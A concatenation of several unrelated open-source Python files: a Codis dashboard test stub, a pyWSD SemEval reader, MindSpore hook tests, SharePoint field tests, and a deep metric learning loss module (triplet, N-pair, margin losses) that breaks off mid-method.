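    #   coordinator_addr = "rootfs"
    #   product_name = "demo-test"
    #   admin_addr = ":18080"
    #   migration_method = "semi-async"
    # followed by the migration and sentinel tuning keys written above.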
if __name__ == "__main__":
children = []
atexit.register(kill_all, children)
product_name = "demo-test"
product_auth = None
children.append(CodisDashboard(18080, product_name, product_auth))
check_alive(children, 3)
while True:
print(datetime.datetime.now())
time.sleep(5)
|
pywsd/semeval.py
|
goodmami/pywsd
| 581 |
85730
|
#!/usr/bin/env python -*- coding: utf-8 -*-
#
# Python Word Sense Disambiguation (pyWSD): SemEval Reader API
#
# Copyright (C) 2014-2020 alvations
# URL:
# For license information, see LICENSE.md
import os, io
from collections import namedtuple
from BeautifulSoup import BeautifulSoup as bsoup
from pywsd.utils import remove_tags, semcor_to_synset
Instance = namedtuple('instance', 'id, lemma, word')
Term = namedtuple('term', 'id, pos, lemma, sense, type')
Word = namedtuple('word', 'id, text, sentid, paraid, term')
Answer = namedtuple('answer', 'sensekey, lemma, pos')
class SemEval2007_Coarse_WSD:
"""
Object to load data from SemEval-2007 Coarse-grain all-words WSD task.
USAGE:
>>> coarse_wsd = SemEval2007_Coarse_WSD()
>>> for inst, ans, sent, doc in coarse_wsd:
... print inst
... print inst.id, inst.lemma, inst.word
... print ans.sensekey
... break
instance(id=u'd001.s001.t001', lemma=u'editorial', word=u'editorial')
d001.s001.t001 editorial editorial
[u'editorial%1:10:00::']
"""
def __init__(self, path='data/semeval2007_coarse_grain_wsd/'):
self.path = path
self.test_file = self.path + 'eng-coarse-all-words.xml'
self.test_ans = self.path + 'dataset21.test.key'
def fileids(self):
""" Returns files from SemEval2007 Coarse-grain All-words WSD task. """
return [os.path.join(self.path,i) for i in os.listdir(self.path)]
def sents(self, filename=None):
"""
Returns the file, line by line. Use test_file if no filename specified.
"""
filename = filename if filename else self.test_file
with io.open(filename, 'r') as fin:
for line in fin:
yield line.strip()
def get_answers(self):
"""
        Returns a {key: value, ...} dictionary of {instance_id: Answer, ...}
>>> coarse_wsd = SemEval2007_Coarse_WSD()
>>> inst2ans = coarse_wsd.get_answers()
>>> for inst in inst2ans:
        ... print inst, inst2ans[inst]
... break
"""
inst2ans = {}
with io.open(self.test_ans, 'r') as fin:
for line in fin:
line, _, lemma = line.strip().rpartition(' !! ')
lemma, pos = lemma[6:].split('#')
textid, _, line = line.partition(' ')
instid, _, line = line.partition(' ')
sensekey = line.split()
# What to do if there is no synset to convert to...
# synsetkey = [semcor_to_synset(i) for i in sensekey]
inst2ans[instid] = Answer(sensekey, lemma, pos)
return inst2ans
def yield_sentences(self):
test_file = io.open(self.test_file, 'r').read()
inst2ans = self.get_answers()
for text in bsoup(test_file).findAll('text'):
if not text:
continue
textid = text['id']
context_doc = " ".join([remove_tags(i) for i in
str(text).split('\n') if remove_tags(i)])
for sent in text.findAll('sentence'):
context_sent = " ".join([remove_tags(i) for i in
str(sent).split('\n') if remove_tags(i)])
yield sent, context_sent, context_doc, inst2ans, textid
def test_instances(self):
"""
Returns the test instances from SemEval2007 Coarse-grain WSD task.
>>> coarse_wsd = SemEval2007_Coarse_WSD()
>>> inst2ans = coarse_wsd.get_answers()
>>> for inst in inst2ans:
... print inst, inst2ans[inst]
... break
d004.s073.t013 answer(sensekey=[u'pointer%1:06:01::', u'pointer%1:06:00::', u'pointer%1:10:00::'], lemma=u'pointer', pos=u'n')
"""
for sent, context_sent, context_doc, inst2ans, textid in self.yield_sentences():
for instance in sent.findAll('instance'):
instid = instance['id']
lemma = instance['lemma']
word = instance.text
inst = Instance(instid, lemma, word)
                yield (inst, inst2ans[instid],
                       unicode(context_sent), unicode(context_doc))
def sentences(self):
"""
Returns the instances by sentences, and yields a list of tokens,
similar to the pywsd.semcor.sentences.
>>> coarse_wsd = SemEval2007_Coarse_WSD()
>>> for sent in coarse_wsd.sentences():
>>> for token in sent:
>>> print token
>>> break
>>> break
word(id=None, text=u'Your', offset=None, sentid=0, paraid=u'd001', term=None)
"""
for sentid, ys in enumerate(self.yield_sentences()):
sent, context_sent, context_doc, inst2ans, textid = ys
instances = {}
for instance in sent.findAll('instance'):
instid = instance['id']
lemma = instance['lemma']
word = instance.text
instances[instid] = Instance(instid, lemma, word)
tokens = []
for i in sent: # Iterates through BeautifulSoup object.
if str(i).startswith('<instance'): # BeautifulSoup.Tag
instid = sent.find('instance')['id']
inst = instances[instid]
answer = inst2ans[instid]
term = Term(instid, answer.pos, inst.lemma, answer.sensekey,
type='open')
tokens.append(Word(instid, inst.word,
sentid, textid, term))
else: # if BeautifulSoup.NavigableString
tokens+=[Word(None, w, sentid, textid, None)
for w in i.split()]
yield tokens
def __iter__(self):
""" Iterator function, duck-type of test_instances() """
return self.sentences()
|
tests/st/pynative/test_pynative_hook.py
|
Greatpanc/mindspore_zhb
| 3,200 |
85745
|
<reponame>Greatpanc/mindspore_zhb
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
import pytest
import numpy as np
import mindspore.nn as nn
import mindspore.common.dtype as mstype
from mindspore import Tensor
from mindspore import context
from mindspore import ParameterTuple
from mindspore.nn import Momentum
from mindspore.nn import WithLossCell
from mindspore.ops import composite as C
from mindspore.ops import operations as P
from mindspore.common.initializer import TruncatedNormal
context.set_context(mode=context.PYNATIVE_MODE, device_target="Ascend")
grad_all = C.GradOperation(get_all=True)
def weight_variable():
"""weight initial"""
return TruncatedNormal(0.02)
def conv(in_channels, out_channels, kernel_size, stride=1, padding=0):
"""weight initial for conv layer"""
weight = weight_variable()
return nn.Conv2d(in_channels, out_channels,
kernel_size=kernel_size, stride=stride, padding=padding,
weight_init=weight, has_bias=False, pad_mode="valid")
def fc_with_initialize(input_channels, out_channels):
"""weight initial for fc layer"""
weight = weight_variable()
bias = weight_variable()
return nn.Dense(input_channels, out_channels, weight, bias)
class test_custom_hook_function_base():
def __init__(self):
pass
def test_custom_hook_function(self, hook_function, cell_hook_function):
return hook_function, cell_hook_function
def cell_hook_function_print_grad(cell_id, grad_input, grad_output):
assert grad_output[0].asnumpy().shape == (32, 6, 14, 14)
assert grad_input[0].asnumpy().shape == (32, 16, 10, 10)
def custom_hook_function_print_and_save_grad(grad_out):
assert grad_out[0].asnumpy().shape == (32, 6, 28, 28)
class LeNet5(nn.Cell):
def __init__(self, hook_function, cell_hook_function, num_class=10):
super(LeNet5, self).__init__()
self.num_class = num_class
self.batch_size = 32
self.conv1 = conv(1, 6, 5)
self.conv2 = conv(6, 16, 5)
self.conv1.register_backward_hook(cell_hook_function)
self.fc1 = fc_with_initialize(16 * 5 * 5, 120)
self.fc2 = fc_with_initialize(120, 84)
self.fc3 = fc_with_initialize(84, self.num_class)
self.relu = nn.ReLU()
self.max_pool2d = nn.MaxPool2d(kernel_size=2, stride=2)
self.reshape = P.Reshape()
self.hook = P.HookBackward(hook_function)
def construct(self, x):
x = self.conv1(x)
x = self.relu(x)
x = self.hook(x)
x = self.max_pool2d(x)
x = self.conv2(x)
x = self.relu(x)
x = self.max_pool2d(x)
x = self.reshape(x, (self.batch_size, -1))
x = self.fc1(x)
x = self.relu(x)
x = self.fc2(x)
x = self.relu(x)
x = self.fc3(x)
return x
class GradWrap(nn.Cell):
""" GradWrap definition """
def __init__(self, network):
super(GradWrap, self).__init__(auto_prefix=False)
self.network = network
self.weights = ParameterTuple(filter(lambda x: x.requires_grad, network.get_parameters()))
def construct(self, x, label):
weights = self.weights
return C.GradOperation(get_by_list=True)(self.network, weights)(x, label)
class test_custom_cell_base():
def __init__(self):
pass
def test_custom_cell_function(self, cell):
return cell
class MulAdd(nn.Cell):
def construct(self, x, y):
return 2 * x + y
def bprop(self, x, y, out, dout):
assert x.asnumpy() == 1.0
assert y.asnumpy() == 2.0
assert out.asnumpy() == 4.0
assert dout.asnumpy() == 1.0
return dout, y
class Ms_Cell(nn.Cell):
def __init__(self):
super(Ms_Cell, self).__init__()
self.relu = P.ReLU()
def construct(self, x):
return self.relu(x)
def bprop(self, x, out, dout):
dout = Tensor(np.float32(0.0))
assert dout.shape == ()
return dout
class Ms_Cell_Change_Shape(nn.Cell):
def __init__(self):
super(Ms_Cell_Change_Shape, self).__init__()
self.relu = P.ReLU()
def construct(self, x):
return self.relu(x)
def bprop(self, x, out, dout):
dout = Tensor(np.ones([5, 5]).astype(np.float32))
assert dout.shape == (5, 5)
return dout
@pytest.mark.level1
@pytest.mark.platform_arm_ascend_training
@pytest.mark.platform_x86_ascend_training
@pytest.mark.env_onecard
def test_pynative_lenet_train_hook_function_print_and_save_grad():
hook = test_custom_hook_function_base()
function = hook.test_custom_hook_function(custom_hook_function_print_and_save_grad,
cell_hook_function_print_grad)
net = LeNet5(hook_function=function[0], cell_hook_function=function[1])
optimizer = Momentum(filter(lambda x: x.requires_grad, net.get_parameters()), 0.1, 0.9)
criterion = nn.SoftmaxCrossEntropyWithLogits(sparse=False)
net_with_criterion = WithLossCell(net, criterion)
train_network = GradWrap(net_with_criterion)
train_network.set_train()
input_data = Tensor(np.ones([net.batch_size, 1, 32, 32]).astype(np.float32) * 0.01)
label = Tensor(np.ones([net.batch_size, net.num_class]).astype(np.float32))
output = net(Tensor(input_data))
criterion(output, label)
grads = train_network(input_data, label)
success = optimizer(grads)
assert success
@pytest.mark.level1
@pytest.mark.platform_arm_ascend_training
@pytest.mark.platform_x86_ascend_training
@pytest.mark.env_onecard
def test_pynative_custom_bprop_and_Cell_MulAdd():
custom_cell = test_custom_cell_base()
mul_add = custom_cell.test_custom_cell_function(MulAdd())
mul_add.bprop_debug = True
grad_all(mul_add)(Tensor(1, mstype.float32), Tensor(2, mstype.float32))
assert grad_all(mul_add)(Tensor(1, mstype.float32), Tensor(2, mstype.float32)) == \
(Tensor(1.0, mstype.float32), Tensor(2.0, mstype.float32))
@pytest.mark.level1
@pytest.mark.platform_arm_ascend_training
@pytest.mark.platform_x86_ascend_training
@pytest.mark.env_onecard
def test_pynative_custom_bprop_and_Cell_Ms_Cell_Change_Shape():
custom_cell = test_custom_cell_base()
ms_Cell = custom_cell.test_custom_cell_function(Ms_Cell_Change_Shape())
ms_Cell.bprop_debug = True
with pytest.raises(RuntimeError) as ex:
grad_all(ms_Cell)(Tensor(1, mstype.float32))
assert "Shapes of input and parameter are different, input index" in str(ex.value)
@pytest.mark.level1
@pytest.mark.platform_arm_ascend_training
@pytest.mark.platform_x86_ascend_training
@pytest.mark.env_onecard
def test_pynative_custom_bprop_and_Cell_Ms_Cell():
custom_cell = test_custom_cell_base()
ms_Cell = custom_cell.test_custom_cell_function(Ms_Cell())
ms_Cell.bprop_debug = True
assert grad_all(ms_Cell)(Tensor(1, mstype.float32)) == (Tensor(0.0, mstype.float32),)
|
tests/sharepoint/test_field.py
|
rikeshtailor/Office365-REST-Python-Client
| 544 |
85753
|
<reponame>rikeshtailor/Office365-REST-Python-Client<filename>tests/sharepoint/test_field.py<gh_stars>100-1000
import uuid
from tests.sharepoint.sharepoint_case import SPTestCase
from office365.sharepoint.fields.field import Field
from office365.sharepoint.fields.field_creation_information import FieldCreationInformation
from office365.sharepoint.fields.field_text import FieldText
from office365.sharepoint.fields.field_type import FieldType
class TestField(SPTestCase):
target_field = None # type: Field
target_field_name = "Title"
def test_1_get_site_fields(self):
site_fields = self.client.site.root_web.fields.top(2).get().execute_query()
self.assertGreater(len(site_fields), 0)
def test_2_get_field(self):
title_field = self.client.site.root_web.fields.\
get_by_internal_name_or_title(self.target_field_name).get().execute_query()
self.assertIsNotNone(title_field.internal_name)
self.assertEqual(title_field.internal_name, self.target_field_name)
self.assertIsInstance(title_field, FieldText)
self.assertIsNotNone(title_field.max_length)
def test_3_get_field_by_title(self):
title_field = self.client.site.root_web.fields.get_by_title(self.target_field_name).get().execute_query()
self.assertIsNotNone(title_field.internal_name)
self.assertEqual(title_field.internal_name, self.target_field_name)
def test_4_create_site_field(self):
field_name = "Title_" + uuid.uuid4().hex
create_field_info = FieldCreationInformation(field_name, FieldType.Text)
created_field = self.client.site.root_web.fields.add(create_field_info).execute_query()
self.assertEqual(created_field.properties["Title"], field_name)
self.__class__.target_field = created_field
def test_5_update_site_field(self):
field_to_update = self.__class__.target_field
updated_field_name = "Title_" + uuid.uuid4().hex
field_to_update.set_property('Title', updated_field_name).update().execute_query()
updated_field = self.client.site.root_web.fields.get_by_title(updated_field_name).get().execute_query()
self.assertIsNotNone(updated_field.id)
self.assertEqual(updated_field.title, updated_field_name)
def test_6_delete_site_field(self):
field_to_delete = self.__class__.target_field
field_to_delete.delete_object().execute_query()
|
DML/losses.py
|
yuichikano/Fashion-Image-Retrieval-System
| 551 |
85777
|
# Copyright 2019 <NAME> and <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
###################### LIBRARIES #################################################
import warnings
warnings.filterwarnings("ignore")
import torch, random, itertools as it, numpy as np, faiss, random
from tqdm import tqdm
from scipy.spatial.distance import cdist
from sklearn.decomposition import PCA
from sklearn.preprocessing import normalize
from PIL import Image
"""================================================================================================="""
############ LOSS SELECTION FUNCTION #####################
def loss_select(loss, opt, to_optim):
"""
Selection function which returns the respective criterion while appending to list of trainable parameters if required.
Args:
loss: str, name of loss function to return.
opt: argparse.Namespace, contains all training-specific parameters.
        to_optim: list of trainable parameters. It is extended if the chosen loss function has trainable parameters of its own.
Returns:
criterion (torch.nn.Module inherited), to_optim (optionally appended)
"""
if loss=='triplet':
loss_params = {'margin':opt.margin, 'sampling_method':opt.sampling}
criterion = TripletLoss(**loss_params)
elif loss=='npair':
loss_params = {'l2':opt.l2npair}
criterion = NPairLoss(**loss_params)
elif loss=='marginloss':
loss_params = {'margin':opt.margin, 'nu': opt.nu, 'beta':opt.beta, 'n_classes':opt.num_classes, 'sampling_method':opt.sampling}
criterion = MarginLoss(**loss_params)
to_optim += [{'params':criterion.parameters(), 'lr':opt.beta_lr, 'weight_decay':0}]
elif loss=='proxynca':
loss_params = {'num_proxies':opt.num_classes, 'embedding_dim':opt.classembed if 'num_cluster' in vars(opt).keys() else opt.embed_dim}
criterion = ProxyNCALoss(**loss_params)
to_optim += [{'params':criterion.parameters(), 'lr':opt.proxy_lr}]
elif loss=='crossentropy':
loss_params = {'n_classes':opt.num_classes, 'inp_dim':opt.embed_dim}
criterion = CEClassLoss(**loss_params)
to_optim += [{'params':criterion.parameters(), 'lr':opt.lr, 'weight_decay':0}]
else:
raise Exception('Loss {} not available!'.format(loss))
return criterion, to_optim
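# Editor's note: an illustrative usage sketch, not part of the original file. The
# Namespace fields mirror exactly what loss_select() reads from `opt` for
# 'marginloss'; the embedder and its hyperparameters are assumptions made for
# this example only.
def _demo_loss_select():
    import argparse
    opt = argparse.Namespace(margin=0.2, sampling='distance', nu=0, beta=1.2,
                             beta_lr=5e-4, num_classes=100)
    embedder = torch.nn.Linear(128, 64)
    to_optim = [{'params': embedder.parameters(), 'lr': 1e-5, 'weight_decay': 4e-4}]
    criterion, to_optim = loss_select('marginloss', opt, to_optim)
    # The returned parameter groups now also contain the trainable betas of MarginLoss.
    optimizer = torch.optim.Adam(to_optim)
    return criterion, optimizer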
"""================================================================================================="""
######### MAIN SAMPLER CLASS #################################
class TupleSampler():
"""
Container for all sampling methods that can be used in conjunction with the respective loss functions.
Based on batch-wise sampling, i.e. given a batch of training data, sample useful data tuples that are
used to train the network more efficiently.
"""
def __init__(self, method='random'):
"""
Args:
method: str, name of sampling method to use.
Returns:
Nothing!
"""
self.method = method
if method=='semihard':
self.give = self.semihardsampling
if method=='softhard':
self.give = self.softhardsampling
elif method=='distance':
self.give = self.distanceweightedsampling
elif method=='npair':
self.give = self.npairsampling
elif method=='random':
self.give = self.randomsampling
def randomsampling(self, batch, labels):
"""
        This method finds all available triplets in a batch given by the classes provided in labels, and randomly
selects <len(batch)> triplets.
Args:
batch: np.ndarray or torch.Tensor, batch-wise embedded training samples.
labels: np.ndarray or torch.Tensor, ground truth labels corresponding to batch.
Returns:
list of sampled data tuples containing reference indices to the position IN THE BATCH.
"""
if isinstance(labels, torch.Tensor): labels = labels.detach().numpy()
unique_classes = np.unique(labels)
indices = np.arange(len(batch))
class_dict = {i:indices[labels==i] for i in unique_classes}
sampled_triplets = [list(it.product([x],[x],[y for y in unique_classes if x!=y])) for x in unique_classes]
sampled_triplets = [x for y in sampled_triplets for x in y]
sampled_triplets = [[x for x in list(it.product(*[class_dict[j] for j in i])) if x[0]!=x[1]] for i in sampled_triplets]
sampled_triplets = [x for y in sampled_triplets for x in y]
#NOTE: The number of possible triplets is given by #unique_classes*(2*(samples_per_class-1)!)*(#unique_classes-1)*samples_per_class
sampled_triplets = random.sample(sampled_triplets, batch.shape[0])
return sampled_triplets
def semihardsampling(self, batch, labels, margin=0.2):
if isinstance(labels, torch.Tensor):
labels = labels.detach().numpy()
bs = batch.size(0)
#Return distance matrix for all elements in batch (BSxBS)
distances = self.pdist(batch.detach()).detach().cpu().numpy()
positives, negatives = [], []
anchors = []
for i in range(bs):
l, d = labels[i], distances[i]
neg = labels!=l; pos = labels==l
anchors.append(i)
pos[i] = False
p = np.random.choice(np.where(pos)[0])
positives.append(p)
            #Find negatives that violate the triplet constraint semi-hardly
neg_mask = np.logical_and(neg,d>d[p])
neg_mask = np.logical_and(neg_mask,d<margin+d[p])
if neg_mask.sum()>0:
negatives.append(np.random.choice(np.where(neg_mask)[0]))
else:
negatives.append(np.random.choice(np.where(neg)[0]))
sampled_triplets = [[a, p, n] for a, p, n in zip(anchors, positives, negatives)]
return sampled_triplets
def softhardsampling(self, batch, labels):
"""
        This method finds all available triplets in a batch given by the classes provided in labels, and selects
triplets based on semihard sampling introduced in 'https://arxiv.org/pdf/1503.03832.pdf'.
Args:
batch: np.ndarray or torch.Tensor, batch-wise embedded training samples.
labels: np.ndarray or torch.Tensor, ground truth labels corresponding to batch.
Returns:
list of sampled data tuples containing reference indices to the position IN THE BATCH.
"""
if isinstance(labels, torch.Tensor): labels = labels.detach().numpy()
bs = batch.size(0)
#Return distance matrix for all elements in batch (BSxBS)
distances = self.pdist(batch.detach()).detach().cpu().numpy()
positives, negatives = [], []
anchors = []
for i in range(bs):
l, d = labels[i], distances[i]
anchors.append(i)
#1 for batchelements with label l
neg = labels!=l; pos = labels==l
#0 for current anchor
pos[i] = False
            #Find negatives that violate the triplet constraint
neg_mask = np.logical_and(neg,d<d[np.where(pos)[0]].max())
#Find positives that violate triplet constraint semi-hardly
pos_mask = np.logical_and(pos,d>d[np.where(neg)[0]].min())
if pos_mask.sum()>0:
positives.append(np.random.choice(np.where(pos_mask)[0]))
else:
positives.append(np.random.choice(np.where(pos)[0]))
if neg_mask.sum()>0:
negatives.append(np.random.choice(np.where(neg_mask)[0]))
else:
negatives.append(np.random.choice(np.where(neg)[0]))
sampled_triplets = [[a, p, n] for a, p, n in zip(anchors, positives, negatives)]
return sampled_triplets
def distanceweightedsampling(self, batch, labels, lower_cutoff=0.5, upper_cutoff=1.4):
"""
        This method finds all available triplets in a batch given by the classes provided in labels, and selects
triplets based on distance sampling introduced in 'Sampling Matters in Deep Embedding Learning'.
Args:
batch: np.ndarray or torch.Tensor, batch-wise embedded training samples.
labels: np.ndarray or torch.Tensor, ground truth labels corresponding to batch.
lower_cutoff: float, lower cutoff value for negatives that are too close to anchor embeddings. Set to literature value. They will be assigned a zero-sample probability.
upper_cutoff: float, upper cutoff value for positives that are too far away from the anchor embeddings. Set to literature value. They will be assigned a zero-sample probability.
Returns:
list of sampled data tuples containing reference indices to the position IN THE BATCH.
"""
if isinstance(labels, torch.Tensor): labels = labels.detach().cpu().numpy()
bs = batch.shape[0]
distances = self.pdist(batch.detach()).clamp(min=lower_cutoff)
positives, negatives = [],[]
labels_visited = []
anchors = []
for i in range(bs):
neg = labels!=labels[i]; pos = labels==labels[i]
q_d_inv = self.inverse_sphere_distances(batch, distances[i], labels, labels[i])
#Sample positives randomly
pos[i] = 0
positives.append(np.random.choice(np.where(pos)[0]))
#Sample negatives by distance
negatives.append(np.random.choice(bs,p=q_d_inv))
sampled_triplets = [[a,p,n] for a,p,n in zip(list(range(bs)), positives, negatives)]
return sampled_triplets
def npairsampling(self, batch, labels):
"""
        This method finds N-Pairs in a batch given by the classes provided in labels, following the
        construction proposed in 'Improved Deep Metric Learning with Multi-class N-pair Loss Objective'.
Args:
batch: np.ndarray or torch.Tensor, batch-wise embedded training samples.
labels: np.ndarray or torch.Tensor, ground truth labels corresponding to batch.
Returns:
list of sampled data tuples containing reference indices to the position IN THE BATCH.
"""
if isinstance(labels, torch.Tensor): labels = labels.detach().cpu().numpy()
label_set, count = np.unique(labels, return_counts=True)
label_set = label_set[count>=2]
pos_pairs = np.array([np.random.choice(np.where(labels==x)[0], 2, replace=False) for x in label_set])
neg_tuples = []
for idx in range(len(pos_pairs)):
neg_tuples.append(pos_pairs[np.delete(np.arange(len(pos_pairs)),idx),1])
neg_tuples = np.array(neg_tuples)
sampled_npairs = [[a,p,*list(neg)] for (a,p),neg in zip(pos_pairs, neg_tuples)]
return sampled_npairs
def pdist(self, A):
"""
Efficient function to compute the distance matrix for a matrix A.
Args:
A: Matrix/Tensor for which the distance matrix is to be computed.
            eps: float, minimal distance/clamping value to ensure no zero values.
Returns:
distance_matrix, clamped to ensure no zero values are passed.
"""
prod = torch.mm(A, A.t())
norm = prod.diag().unsqueeze(1).expand_as(prod)
res = (norm + norm.t() - 2 * prod).clamp(min = 0)
return res.clamp(min = 0).sqrt()
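    @staticmethod
    def _pdist_sanity_check(n=8, d=16):
        """Editor's note: illustrative helper, not part of the original file.
        Checks the identity ||a-b||^2 = ||a||^2 + ||b||^2 - 2*a.b used by
        pdist() against torch.cdist on random data."""
        A = torch.randn(n, d)
        prod = torch.mm(A, A.t())
        norm = prod.diag().unsqueeze(1).expand_as(prod)
        dist = (norm + norm.t() - 2 * prod).clamp(min=0).sqrt()
        assert torch.allclose(dist, torch.cdist(A, A), atol=1e-4)
        return dist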
def inverse_sphere_distances(self, batch, dist, labels, anchor_label):
"""
Function to utilise the distances of batch samples to compute their
        probability of occurrence, and using the inverse to sample actual negatives to the resp. anchor.
Args:
batch: torch.Tensor(), batch for which the sampling probabilities w.r.t to the anchor are computed. Used only to extract the shape.
dist: torch.Tensor(), computed distances between anchor to all batch samples.
labels: np.ndarray, labels for each sample for which distances were computed in dist.
anchor_label: float, anchor label
Returns:
            q_d_inv: np.ndarray, inverse-distance based sampling probabilities for the batch elements (positives set to zero).
"""
bs,dim = len(dist),batch.shape[-1]
#negated log-distribution of distances of unit sphere in dimension <dim>
log_q_d_inv = ((2.0 - float(dim)) * torch.log(dist) - (float(dim-3) / 2) * torch.log(1.0 - 0.25 * (dist.pow(2))))
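        # Editor's note: the expression above is -log q(d), where
        # q(d) ∝ d^(dim-2) * (1 - d^2/4)^((dim-3)/2) is the pairwise-distance
        # density on the unit sphere from 'Sampling Matters in Deep Embedding
        # Learning'; sampling negatives with probability ∝ 1/q(d) flattens the
        # distance distribution of the drawn negatives.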
#Set sampling probabilities of positives to zero
log_q_d_inv[np.where(labels==anchor_label)[0]] = 0
q_d_inv = torch.exp(log_q_d_inv - torch.max(log_q_d_inv)) # - max(log) for stability
#Set sampling probabilities of positives to zero
q_d_inv[np.where(labels==anchor_label)[0]] = 0
### NOTE: Cutting of values with high distances made the results slightly worse.
# q_d_inv[np.where(dist>upper_cutoff)[0]] = 0
#Normalize inverted distance for probability distr.
q_d_inv = q_d_inv/q_d_inv.sum()
return q_d_inv.detach().cpu().numpy()
"""================================================================================================="""
### Standard Triplet Loss, finds triplets in Mini-batches.
class TripletLoss(torch.nn.Module):
def __init__(self, margin=1, sampling_method='random'):
"""
Basic Triplet Loss as proposed in 'FaceNet: A Unified Embedding for Face Recognition and Clustering'
Args:
margin: float, Triplet Margin - Ensures that positives aren't placed arbitrarily close to the anchor.
                    Similarly, negatives should not be placed arbitrarily far away.
sampling_method: Method to use for sampling training triplets. Used for the TupleSampler-class.
"""
super(TripletLoss, self).__init__()
self.margin = margin
self.sampler = TupleSampler(method=sampling_method)
def triplet_distance(self, anchor, positive, negative):
"""
Compute triplet loss.
Args:
anchor, positive, negative: torch.Tensor(), resp. embeddings for anchor, positive and negative samples.
Returns:
triplet loss (torch.Tensor())
"""
return torch.nn.functional.relu((anchor-positive).pow(2).sum()-(anchor-negative).pow(2).sum()+self.margin)
def forward(self, batch, labels):
"""
Args:
batch: torch.Tensor() [(BS x embed_dim)], batch of embeddings
labels: np.ndarray [(BS x 1)], for each element of the batch assigns a class [0,...,C-1]
Returns:
triplet loss (torch.Tensor(), batch-averaged)
"""
#Sample triplets to use for training.
sampled_triplets = self.sampler.give(batch, labels)
#Compute triplet loss
loss = torch.stack([self.triplet_distance(batch[triplet[0],:],batch[triplet[1],:],batch[triplet[2],:]) for triplet in sampled_triplets])
return torch.mean(loss)
"""================================================================================================="""
### Standard N-Pair Loss.
class NPairLoss(torch.nn.Module):
def __init__(self, l2=0.02):
"""
Basic N-Pair Loss as proposed in 'Improved Deep Metric Learning with Multi-class N-pair Loss Objective'
Args:
            l2: float, weighting parameter for the weight penalty due to embeddings not being normalized.
Returns:
Nothing!
"""
super(NPairLoss, self).__init__()
self.sampler = TupleSampler(method='npair')
self.l2 = l2
def npair_distance(self, anchor, positive, negatives):
"""
Compute basic N-Pair loss.
Args:
anchor, positive, negative: torch.Tensor(), resp. embeddings for anchor, positive and negative samples.
Returns:
n-pair loss (torch.Tensor())
"""
return torch.log(1+torch.sum(torch.exp(anchor.mm((negatives-positive).transpose(0,1)))))
def weightsum(self, anchor, positive):
"""
Compute weight penalty.
NOTE: Only need to penalize anchor and positive since the negatives are created based on these.
Args:
anchor, positive: torch.Tensor(), resp. embeddings for anchor and positive samples.
Returns:
torch.Tensor(), Weight penalty
"""
return torch.sum(anchor**2+positive**2)
def forward(self, batch, labels):
"""
Args:
batch: torch.Tensor() [(BS x embed_dim)], batch of embeddings
labels: np.ndarray [(BS x 1)], for each element of the batch assigns a class [0,...,C-1]
Returns:
n-pair loss (torch.Tensor(), batch-averaged)
"""
#Sample N-Pairs
sampled_npairs = self.sampler.give(batch, labels)
        #Compute basic n-pair loss
loss = torch.stack([self.npair_distance(batch[npair[0]:npair[0]+1,:],batch[npair[1]:npair[1]+1,:],batch[npair[2:],:]) for npair in sampled_npairs])
#Include weight penalty
loss = loss + self.l2*torch.mean(torch.stack([self.weightsum(batch[npair[0],:], batch[npair[1],:]) for npair in sampled_npairs]))
return torch.mean(loss)
"""================================================================================================="""
### MarginLoss with trainable class separation margin beta. Runs on Mini-batches as well.
class MarginLoss(torch.nn.Module):
def __init__(self, margin=0.2, nu=0, beta=1.2, n_classes=100, beta_constant=False, sampling_method='distance'):
"""
Basic Margin Loss as proposed in 'Sampling Matters in Deep Embedding Learning'.
Args:
margin: float, fixed triplet margin (see also TripletLoss).
nu: float, regularisation weight for beta. Zero by default (in literature as well).
beta: float, initial value for trainable class margins. Set to default literature value.
n_classes: int, number of target class. Required because it dictates the number of trainable class margins.
beta_constant: bool, set to True if betas should not be trained.
sampling_method: str, sampling method to use to generate training triplets.
Returns:
Nothing!
"""
super(MarginLoss, self).__init__()
self.margin = margin
self.n_classes = n_classes
self.beta_constant = beta_constant
self.beta_val = beta
self.beta = beta if beta_constant else torch.nn.Parameter(torch.ones(n_classes)*beta)
self.nu = nu
self.sampling_method = sampling_method
self.sampler = TupleSampler(method=sampling_method)
def forward(self, batch, labels):
"""
Args:
batch: torch.Tensor() [(BS x embed_dim)], batch of embeddings
labels: np.ndarray [(BS x 1)], for each element of the batch assigns a class [0,...,C-1]
Returns:
margin loss (torch.Tensor(), batch-averaged)
"""
if isinstance(labels, torch.Tensor): labels = labels.detach().cpu().numpy()
sampled_triplets = self.sampler.give(batch, labels)
#Compute distances between anchor-positive and anchor-negative.
d_ap, d_an = [],[]
for triplet in sampled_triplets:
train_triplet = {'Anchor': batch[triplet[0],:], 'Positive':batch[triplet[1],:], 'Negative':batch[triplet[2]]}
pos_dist = ((train_triplet['Anchor']-train_triplet['Positive']).pow(2).sum()+1e-8).pow(1/2)
neg_dist = ((train_triplet['Anchor']-train_triplet['Negative']).pow(2).sum()+1e-8).pow(1/2)
d_ap.append(pos_dist)
d_an.append(neg_dist)
d_ap, d_an = torch.stack(d_ap), torch.stack(d_an)
#Group betas together by anchor class in sampled triplets (as each beta belongs to one class).
if self.beta_constant:
beta = self.beta
else:
beta = torch.stack([self.beta[labels[triplet[0]]] for triplet in sampled_triplets]).type(torch.cuda.FloatTensor)
#Compute actual margin postive and margin negative loss
pos_loss = torch.nn.functional.relu(d_ap-beta+self.margin)
neg_loss = torch.nn.functional.relu(beta-d_an+self.margin)
#Compute normalization constant
pair_count = torch.sum((pos_loss>0.)+(neg_loss>0.)).type(torch.cuda.FloatTensor)
#Actual Margin Loss
loss = torch.sum(pos_loss+neg_loss) if pair_count==0. else torch.sum(pos_loss+neg_loss)/pair_count
        #(Optional) Add regularization penalty on betas. The original file referenced
        # beta_regularisation_loss without defining it; it is assumed here to be nu * sum(beta),
        # matching the beta regularisation described in 'Sampling Matters in Deep Embedding Learning'.
        if self.nu:
